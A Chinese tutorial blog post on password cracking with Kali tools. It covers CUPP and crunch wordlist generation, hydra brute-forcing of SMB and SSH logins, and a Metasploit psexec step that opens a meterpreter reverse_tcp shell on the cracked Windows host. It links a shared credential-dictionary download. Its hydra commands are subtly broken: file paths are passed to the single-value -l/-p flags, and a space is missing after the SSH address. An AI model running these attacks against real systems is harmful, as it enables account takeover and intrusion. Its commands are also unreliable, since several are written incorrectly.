2022-渗透测试-口令破解-几款暴力破解和字典生成的工具

简介: 2022-渗透测试-口令破解-几款暴力破解和字典生成的工具

 目录

1.CUPP(kali)

2.亦思社会工程学学点生成器

3.一句话密码破解工具

4.crunch(kali)

5.hydra(kali)

1.CUPP(kali)

首先,安装cupp软件

 

apt install -y cupp

image.gif

image.gif编辑

新建一个文件夹,用于保存生成的字典

image.gif编辑

输入 cupp -i 命令开始编辑生成字典

image.gif编辑

根据自己已知的信息,生成字典。

image.gif编辑

查看生成的字典 cat san.txt

2.亦思社会工程学学点生成器

image.gif编辑

3.一句话密码破解工具

image.gif编辑

4.crunch(kali)

       crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。

首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)

image.gif编辑

查看帮助

man crunch > crunch.help

image.gif

命令格式

crunch <min-len> <max-len> [<charset string>]  [options]

image.gif

参数说明

min-len         设定最小字符串长度(必选)
max-len         设定最大字符串长度(必选)
charset string  字符集
options
-b              指定文件输出的大小,避免字典文件过大
-c              指定文件输出的行数,即包含密码的个数
-d              限制相同元素出现的次数
-e              定义停止字符,即到该字符串就停止生成
-f              调用库文件

image.gif

特殊字符

%  代表数字
^  代表特殊符号
@  代表小写字母
, 代表大写字母

image.gif

查看库文件

cat /usr/share/crunch/charset.lst

image.gif

如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。

image.gif编辑

例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束

crunch 1 8

image.gif编辑

例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束

crunch 1 6 abcdefg

image.gif编辑

例子3:生成指定字符串,比如生日的日期(%代表数字)

crunch 8 8 -t 199307%% -e 19930730

image.gif编辑

例子4:生成元素的组合,比如123.com

crunch 7 7 -t %%%.com -s 111.com -e 123.com

image.gif编辑

例子5:在字典中输出特殊字符

crunch 3 3  abc -t @@@ -l @aa

image.gif编辑

例子6: 以元素组合生成字典[zhangsan|1993|0701]

crunch 4 4 -p zhangsan 1992 0701

image.gif编辑

例子6:

自定义字符集合

vim /usr/share/crunch/charset.lst

创建自定义字符集合

添加一个字符集

image.gif编辑

使用自定义字符集生成[*.com] 字典文件

crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com

image.gif编辑

5.hydra(kali)

首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。

image.gif编辑

windows口令破解

hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr

image.gif

-l  指定一个用户名
-p  指定一个密码
-P  指定密码字典
-L  指定用户名字典
-vV 显示爆破细节
-o  保存爆破结果
-f  找到正确的密码就停止爆破
-e  
  n null
  s same
  r 反向
-t  线程

image.gif

爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。

建立payload    set payload windows/meterpreter/reverse_tcp

image.gif编辑

查看需要配置的参数 show options

image.gif编辑

设置目标主机 set RHOSTS 192.168.0.110

设置账号和密码 set SMBPass xxx    set SMBUser  xxx

run或者exploit进行连接

linux口令破解

linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。

破解ssh服务

hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64

image.gif

分享下载链接

亦思社会工程学字典生成器

一句话密码破解工具

常用的账号和密码字典

链接:https://pan.baidu.com/s/1ErRFv4vnpHZxIufOhCjK3g 

提取码:bc9o


目录
打赏
0
0
0
0
321
分享
相关文章
软件测试中的自动化策略与工具应用
在软件开发的快速迭代中,自动化测试以其高效、稳定的特点成为了质量保证的重要手段。本文将深入探讨自动化测试的核心概念、常见工具的应用,以及如何设计有效的自动化测试策略,旨在为读者提供一套完整的自动化测试解决方案,帮助团队提升测试效率和软件质量。
Selenium:强大的 Web 自动化测试工具
Selenium 是一款强大的 Web 自动化测试工具,包括 Selenium IDE、WebDriver 和 Grid 三大组件,支持多种编程语言和跨平台操作。它能有效提高测试效率,解决跨浏览器兼容性问题,进行性能测试和数据驱动测试,尽管存在学习曲线较陡、不稳定等缺点,但其优势明显,是自动化测试领域的首选工具。
284 17
Selenium:强大的 Web 自动化测试工具
一些适合性能测试脚本编写和维护的工具
一些适合性能测试脚本编写和维护的工具
151 59
BALROG:基准测试工具,用于评估 LLMs 和 VLMs 在复杂动态环境中的推理能力
BALROG 是一款用于评估大型语言模型(LLMs)和视觉语言模型(VLMs)在复杂动态环境中推理能力的基准测试工具。它通过一系列挑战性的游戏环境,如 NetHack,测试模型的规划、空间推理和探索能力。BALROG 提供了一个开放且细粒度的评估框架,推动了自主代理研究的进展。
89 3
BALROG:基准测试工具,用于评估 LLMs 和 VLMs 在复杂动态环境中的推理能力
移动端性能测试工具
移动端性能测试工具
164 2
如何选择合适的自动化安全测试工具
选择合适的自动化安全测试工具需考虑多个因素,包括项目需求、测试目标、系统类型和技术栈,工具的功能特性、市场评价、成本和许可,以及集成性、误报率、社区支持、易用性和安全性。综合评估这些因素,可确保所选工具满足项目需求和团队能力。
最好用的17个渗透测试工具
渗透测试是安全人员为防止恶意黑客利用系统漏洞而进行的操作。本文介绍了17款业内常用的渗透测试工具,涵盖网络发现、无线评估、Web应用测试、SQL注入等多个领域,包括Nmap、Aircrack-ng、Burp Suite、OWASP ZAP等,既有免费开源工具,也有付费专业软件,适用于不同需求的安全专家。
548 2
|
5月前
|
Flink-03 Flink Java 3分钟上手 Stream 给 Flink-02 DataStreamSource Socket写一个测试的工具!
Flink-03 Flink Java 3分钟上手 Stream 给 Flink-02 DataStreamSource Socket写一个测试的工具!
69 1
Flink-03 Flink Java 3分钟上手 Stream 给 Flink-02 DataStreamSource Socket写一个测试的工具!
Playwright 是一个强大的工具,用于在各种浏览器上测试应用,并模拟真实设备如手机和平板。通过配置 `playwright.devices`,可以轻松模拟不同设备的用户代理、屏幕尺寸、视口等特性。此外,Playwright 还支持模拟地理位置、区域设置、时区、权限(如通知)和配色方案,使测试更加全面和真实。例如,可以在配置文件中设置全局的区域设置和时区,然后在特定测试中进行覆盖。同时,还可以动态更改地理位置和媒体类型,以适应不同的测试需求。
Playwright 是一个强大的工具,用于在各种浏览器上测试应用,并模拟真实设备如手机和平板。通过配置 `playwright.devices`,可以轻松模拟不同设备的用户代理、屏幕尺寸、视口等特性。此外,Playwright 还支持模拟地理位置、区域设置、时区、权限(如通知)和配色方案,使测试更加全面和真实。例如,可以在配置文件中设置全局的区域设置和时区,然后在特定测试中进行覆盖。同时,还可以动态更改地理位置和媒体类型,以适应不同的测试需求。
282 1
提升软件测试效率的实用技巧与工具
【10月更文挑战第12天】 本文将深入探讨如何通过优化测试流程、引入自动化工具和持续集成等策略,来显著提高软件测试的效率。我们将分享一些实用的技巧和工具,帮助测试人员更高效地发现和定位问题,确保软件质量。
99 2

热门文章

最新文章

  • 1
    小鱼深度评测 | 通义灵码2.0,不仅可跨语言编码,自动生成单元测试,更炸裂的是集成DeepSeek模型且免费使用,太炸裂了。
    48817
  • 2
    3天功能开发→3小时:通义灵码2.0+DEEPSEEK实测报告,单元测试生成准确率92%的秘密
    37
  • 3
    Potpie.ai:比Copilot更狠!这个AI直接接管项目代码,自动Debug+测试+开发全搞定
    14
  • 4
    【01】噩梦终结flutter配安卓android鸿蒙harmonyOS 以及next调试环境配鸿蒙和ios真机调试环境-flutter项目安卓环境配置-gradle-agp-ndkVersion模拟器运行真机测试环境-本地环境搭建-如何快速搭建android本地运行环境-优雅草卓伊凡-很多人在这步就被难倒了
    26
  • 5
    基于FPGA的图像双线性插值算法verilog实现,包括tb测试文件和MATLAB辅助验证
    4
  • 6
    大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
    7
  • 7
    「ximagine」业余爱好者的非专业显示器测试流程规范,同时也是本账号输出内容的数据来源!如何测试显示器?荒岛整理总结出多种测试方法和注意事项,以及粗浅的原理解析!
    9
  • 8
    用户说 | 通义灵码2.0,跨语言编码+自动生成单元测试+集成DeepSeek模型且免费使用
    23
  • 9
    阿里云零门槛、轻松部署您的专属 DeepSeek模型体验测试
    56
  • 10
    以项目登录接口为例-大前端之开发postman请求接口带token的请求测试-前端开发必学之一-如果要学会联调接口而不是纯写静态前端页面-这个是必学-本文以优雅草蜻蜓Q系统API为实践来演示我们如何带token请求接口-优雅草卓伊凡
    5